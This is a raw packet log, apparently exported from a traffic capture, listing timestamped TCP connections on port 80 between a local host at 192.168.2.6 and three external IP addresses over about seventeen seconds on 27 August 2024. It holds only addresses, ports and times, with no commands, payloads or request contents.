Aug 27, 2024 14:22:19.693794966 CEST	80	52599	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:20.208172083 CEST	80	52598	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:20.208334923 CEST	52598	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:20.264007092 CEST	52599	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:20.264170885 CEST	52593	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:20.313441992 CEST	52598	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:20.313441038 CEST	52600	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:20.318375111 CEST	80	52600	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:20.318552971 CEST	52600	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:20.318756104 CEST	52600	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:20.345863104 CEST	80	52598	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:20.345967054 CEST	52598	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:20.346581936 CEST	80	52600	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:20.380131960 CEST	52601	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:20.380590916 CEST	52602	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:20.385669947 CEST	80	52601	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:20.385684013 CEST	80	52602	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:20.385768890 CEST	52601	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:20.385914087 CEST	52602	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:20.399070978 CEST	52601	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:20.399241924 CEST	52602	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:20.404145956 CEST	80	52601	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:20.405195951 CEST	80	52602	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:21.085562944 CEST	80	52600	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:21.085635900 CEST	52600	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:21.104803085 CEST	52600	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:21.105140924 CEST	52603	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:21.111159086 CEST	80	52600	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:21.111207962 CEST	80	52603	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:21.111219883 CEST	52600	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:21.111269951 CEST	52603	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:21.117810965 CEST	52603	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:21.122740984 CEST	80	52603	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:21.929234982 CEST	80	52603	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:21.929363966 CEST	52603	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:21.988760948 CEST	80	52602	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:21.988874912 CEST	52602	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:21.988950968 CEST	52602	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:21.991394997 CEST	52604	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:21.994487047 CEST	80	52602	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:21.997538090 CEST	80	52604	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:22.000206947 CEST	52604	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:22.000421047 CEST	52604	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:22.006360054 CEST	80	52604	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:22.047733068 CEST	52603	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:22.047733068 CEST	52605	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:22.056957960 CEST	80	52605	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:22.057152033 CEST	52605	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:22.057563066 CEST	80	52603	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:22.057595015 CEST	52605	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:22.057661057 CEST	52603	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:22.063373089 CEST	80	52605	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:22.878428936 CEST	80	52605	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:22.878503084 CEST	52605	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:22.881757021 CEST	52605	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:22.882014036 CEST	52606	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:22.886904955 CEST	80	52605	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:22.886919022 CEST	80	52606	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:22.886960983 CEST	52605	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:22.887002945 CEST	52606	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:22.887160063 CEST	52606	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:22.893472910 CEST	80	52606	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:23.613977909 CEST	80	52604	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:23.617604971 CEST	52604	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:23.617711067 CEST	52604	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:23.622549057 CEST	80	52604	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:23.660130024 CEST	80	52606	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:23.665461063 CEST	52606	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:23.735270023 CEST	52607	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:23.745801926 CEST	80	52607	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:23.749696016 CEST	52607	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:23.753660917 CEST	52607	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:23.758487940 CEST	80	52607	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:23.781605959 CEST	52606	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:23.781951904 CEST	52608	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:23.786961079 CEST	80	52606	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:23.787516117 CEST	52606	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:23.787590981 CEST	80	52608	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:23.787693024 CEST	52608	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:23.787866116 CEST	52608	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:23.797555923 CEST	80	52608	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:24.326488018 CEST	52608	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:24.326620102 CEST	52601	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:24.326623917 CEST	52607	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:24.329798937 CEST	52609	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:24.330147028 CEST	52611	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:24.330152988 CEST	52610	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:24.334811926 CEST	80	52609	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:24.334975958 CEST	80	52611	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:24.334988117 CEST	80	52610	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:24.335077047 CEST	52611	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:24.335078001 CEST	52609	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:24.335182905 CEST	52610	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:24.335282087 CEST	52611	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:24.335282087 CEST	52609	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:24.337610960 CEST	52610	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:24.340054035 CEST	80	52611	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:24.340189934 CEST	80	52609	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:24.342483044 CEST	80	52610	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:25.022566080 CEST	80	52609	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:25.022635937 CEST	52609	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:25.126822948 CEST	52609	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:25.127182961 CEST	52612	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:25.131989956 CEST	80	52612	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:25.132015944 CEST	80	52609	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:25.132055998 CEST	52612	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:25.132077932 CEST	52609	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:25.132215023 CEST	52612	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:25.139559984 CEST	80	52612	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:25.905504942 CEST	80	52612	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:25.905689001 CEST	52612	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:25.908461094 CEST	52612	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:25.908468008 CEST	52613	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:25.913314104 CEST	80	52613	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:25.913403034 CEST	52613	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:25.913480997 CEST	80	52612	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:25.913579941 CEST	52613	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:25.913609028 CEST	52612	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:25.919589043 CEST	80	52613	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:25.921983957 CEST	80	52611	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:25.922079086 CEST	52611	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:25.922122955 CEST	52611	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:25.928005934 CEST	80	52611	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:26.032561064 CEST	52614	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:26.037509918 CEST	80	52614	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:26.037676096 CEST	52614	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:26.039730072 CEST	52614	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:26.044567108 CEST	80	52614	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:26.598619938 CEST	80	52613	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:26.598697901 CEST	52613	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:26.704500914 CEST	52613	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:26.704807997 CEST	52615	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:26.709875107 CEST	80	52613	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:26.709928036 CEST	52613	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:26.709971905 CEST	80	52615	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:26.710035086 CEST	52615	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:26.710185051 CEST	52615	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:26.715209007 CEST	80	52615	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:27.398937941 CEST	80	52615	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:27.398999929 CEST	52615	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:27.401921034 CEST	52615	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:27.402264118 CEST	52616	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:27.407689095 CEST	80	52615	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:27.407700062 CEST	80	52616	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:27.407737017 CEST	52615	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:27.407778978 CEST	52616	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:27.407895088 CEST	52616	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:27.412682056 CEST	80	52616	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:27.628012896 CEST	80	52614	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:27.633351088 CEST	52614	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:27.633351088 CEST	52614	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:27.637620926 CEST	52617	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:27.638302088 CEST	80	52614	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:27.642431021 CEST	80	52617	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:27.645781040 CEST	52617	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:27.645781040 CEST	52617	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:27.650692940 CEST	80	52617	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:28.110399008 CEST	80	52616	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:28.111805916 CEST	52616	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:28.219595909 CEST	52616	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:28.219624996 CEST	52618	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:28.224601984 CEST	80	52618	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:28.224826097 CEST	80	52616	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:28.227694988 CEST	52616	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:28.227729082 CEST	52618	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:28.227823973 CEST	52618	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:28.232691050 CEST	80	52618	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:28.342160940 CEST	52610	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:28.342258930 CEST	52617	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:28.342267036 CEST	52618	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:28.349615097 CEST	52619	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:28.354543924 CEST	80	52619	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:28.357887983 CEST	52619	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:28.358091116 CEST	52619	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:28.363189936 CEST	80	52619	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:28.454498053 CEST	52621	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:28.454644918 CEST	52620	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:28.461500883 CEST	80	52621	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:28.461549997 CEST	80	52620	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:28.461582899 CEST	52621	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:28.461703062 CEST	52621	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:28.461802006 CEST	52620	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:28.461949110 CEST	52620	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:28.468290091 CEST	80	52621	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:28.468527079 CEST	80	52620	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:29.073903084 CEST	80	52619	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:29.073976994 CEST	52619	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:29.204125881 CEST	52619	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:29.204396009 CEST	52622	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:29.209397078 CEST	80	52622	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:29.209465981 CEST	52622	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:29.209511995 CEST	80	52619	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:29.209568024 CEST	52622	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:29.209568024 CEST	52619	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:29.214478016 CEST	80	52622	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:29.893024921 CEST	80	52622	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:29.899667025 CEST	52622	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:29.919620037 CEST	52623	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:29.919627905 CEST	52622	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:29.930207968 CEST	80	52623	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:29.930480957 CEST	80	52622	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:29.931157112 CEST	52623	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:29.931160927 CEST	52622	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:29.953242064 CEST	52623	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:29.961540937 CEST	80	52623	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:30.066379070 CEST	80	52620	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:30.067725897 CEST	52620	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:30.067936897 CEST	52620	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:30.072706938 CEST	80	52620	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:30.080028057 CEST	52624	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:30.089448929 CEST	80	52624	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:30.091682911 CEST	52624	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:30.091813087 CEST	52624	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:30.096868038 CEST	80	52624	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:30.629771948 CEST	80	52623	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:30.629822969 CEST	52623	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:30.735886097 CEST	52623	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:30.736275911 CEST	52625	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:30.741125107 CEST	80	52625	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:30.741194010 CEST	52625	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:30.741337061 CEST	52625	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:30.743612051 CEST	80	52623	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:30.743680000 CEST	52623	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:30.746166945 CEST	80	52625	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:31.454443932 CEST	80	52625	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:31.454560995 CEST	52625	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:31.468765020 CEST	52625	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:31.469177008 CEST	52626	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:31.475476980 CEST	80	52625	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:31.475528955 CEST	52625	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:31.476387978 CEST	80	52626	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:31.476438046 CEST	52626	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:31.476892948 CEST	52626	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:31.483333111 CEST	80	52626	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:31.727416039 CEST	80	52624	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:31.727775097 CEST	52624	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:31.727775097 CEST	52624	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:31.732774973 CEST	80	52624	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:31.847692013 CEST	52627	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:31.852632046 CEST	80	52627	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:31.856046915 CEST	52627	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:31.856046915 CEST	52627	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:31.862080097 CEST	80	52627	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:32.160926104 CEST	80	52626	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:32.160991907 CEST	52626	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:32.266694069 CEST	52628	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:32.266694069 CEST	52626	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:32.271787882 CEST	80	52628	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:32.272146940 CEST	52628	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:32.272713900 CEST	52628	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:32.272869110 CEST	80	52626	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:32.272929907 CEST	52626	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:32.278145075 CEST	80	52628	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:32.384104967 CEST	52621	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:32.384232998 CEST	52627	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:32.384253025 CEST	52628	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:32.413625956 CEST	52629	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:32.415649891 CEST	52630	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:32.417687893 CEST	52631	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:32.418467999 CEST	80	52629	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:32.420485973 CEST	80	52630	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:32.421677113 CEST	52629	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:32.421679974 CEST	52630	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:32.422497988 CEST	80	52631	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:32.423069954 CEST	52629	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:22:32.423166037 CEST	52631	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:32.423408985 CEST	52630	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:32.423456907 CEST	52631	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:32.427923918 CEST	80	52629	89.23.103.42	192.168.2.6
Aug 27, 2024 14:22:32.428423882 CEST	80	52630	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:32.428558111 CEST	80	52631	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:33.110272884 CEST	80	52630	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:33.110351086 CEST	52630	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:33.219115973 CEST	52630	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:33.219394922 CEST	52632	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:33.224210978 CEST	80	52630	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:33.224224091 CEST	80	52632	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:33.224267006 CEST	52630	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:33.224293947 CEST	52632	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:33.224503040 CEST	52632	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:33.229233027 CEST	80	52632	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:33.898205042 CEST	80	52632	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:33.902280092 CEST	52632	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:33.902280092 CEST	52632	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:33.903688908 CEST	52633	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:33.907658100 CEST	80	52632	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:33.908668995 CEST	80	52633	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:33.911767960 CEST	52632	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:33.911772966 CEST	52633	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:33.916002989 CEST	52633	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:33.920936108 CEST	80	52633	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:34.021471977 CEST	80	52631	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:34.023803949 CEST	52631	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:34.035640955 CEST	52631	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:34.040695906 CEST	80	52631	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:34.143901110 CEST	52634	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:34.149452925 CEST	80	52634	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:34.149525881 CEST	52634	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:34.149780989 CEST	52634	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:34.154572010 CEST	80	52634	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:34.637321949 CEST	80	52633	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:34.637378931 CEST	52633	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:34.752336025 CEST	52633	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:34.752640963 CEST	52635	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:34.757461071 CEST	80	52633	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:34.757473946 CEST	80	52635	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:34.757514954 CEST	52633	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:34.757559061 CEST	52635	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:34.757747889 CEST	52635	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:34.762845993 CEST	80	52635	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:35.433418989 CEST	80	52635	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:35.433592081 CEST	52635	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:35.489857912 CEST	52635	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:35.490293026 CEST	52636	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:35.495316029 CEST	80	52635	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:35.495367050 CEST	52635	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:35.495389938 CEST	80	52636	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:35.495449066 CEST	52636	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:35.495619059 CEST	52636	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:35.500395060 CEST	80	52636	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:35.737462044 CEST	80	52634	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:35.741818905 CEST	52634	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:35.741987944 CEST	52634	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:35.744293928 CEST	52637	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:35.746829033 CEST	80	52634	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:35.749296904 CEST	80	52637	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:35.749547958 CEST	52637	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:35.751971960 CEST	52637	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:22:35.756820917 CEST	80	52637	185.209.162.226	192.168.2.6
Aug 27, 2024 14:22:36.176547050 CEST	80	52636	185.208.158.116	192.168.2.6
Aug 27, 2024 14:22:36.181716919 CEST	52636	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:36.297925949 CEST	52638	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:22:36.297935963 CEST	52636	80	192.168.2.6	185.208.158.116
